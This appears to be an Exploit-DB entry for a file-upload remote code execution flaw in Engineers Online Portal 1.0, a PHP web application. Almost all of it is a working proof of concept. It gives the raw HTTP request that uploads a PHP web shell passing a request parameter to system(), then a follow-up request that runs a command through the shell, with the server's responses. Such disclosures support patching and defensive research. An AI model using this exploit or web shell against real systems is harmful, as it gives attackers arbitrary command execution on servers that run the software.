Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)

EDB-ID:

50444

CVE:

N/A


Author:

SadKris

Type:

webapps


Platform:

PHP

Date:

2021-10-25


# Exploit Title: Engineers Online Portal 1.0 - File Upload Remote Code Execution (RCE)
# Date: 10/23/2021
# Exploit Author: SadKris
# Venor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/13115/engineers-online-portal-php.html
# Version: 1.0
# Tested on: XAMPP, Windows 11

# ------------------------------------------------------------------------------------------
# POC
# ------------------------------------------------------------------------------------------

# Request sent as base user

POST /EngineerShit/teacher_avatar.php HTTP/1.1
Host: localhost.me
Content-Length: 510
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost.me
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygBJiBS0af0X03GTp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost.me/EngineerShit/dasboard_teacher.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi
Connection: close

------WebKitFormBoundarygBJiBS0af0X03GTp
Content-Disposition: form-data; name="image"; filename="vuln.php"
Content-Type: application/octet-stream

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
if($_REQUEST['x']) {
  system($_REQUEST['x']);
  } else phpinfo();
?>
------WebKitFormBoundarygBJiBS0af0X03GTp
Content-Disposition: form-data; name="change"

# Response

HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 01:51:19 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 119
Connection: close
Content-Type: text/html; charset=UTF-8

<script>
	window.location = "dasboard_teacher.php";
</script>

# ------------------------------------------------------------------------------------------
# Request to webshell
# ------------------------------------------------------------------------------------------

GET /EngineerShit/admin/uploads/vuln.php?x=echo%20gottem%20bois HTTP/1.1
Host: localhost.me
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=tthnf1egn6dvjjpg9ackkglpfi
Connection: close

# ------------------------------------------------------------------------------------------
# Webshell response
# ------------------------------------------------------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 24 Oct 2021 01:54:07 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.12
X-Powered-By: PHP/8.0.12
Content-Length: 154
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="x">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
gottem bois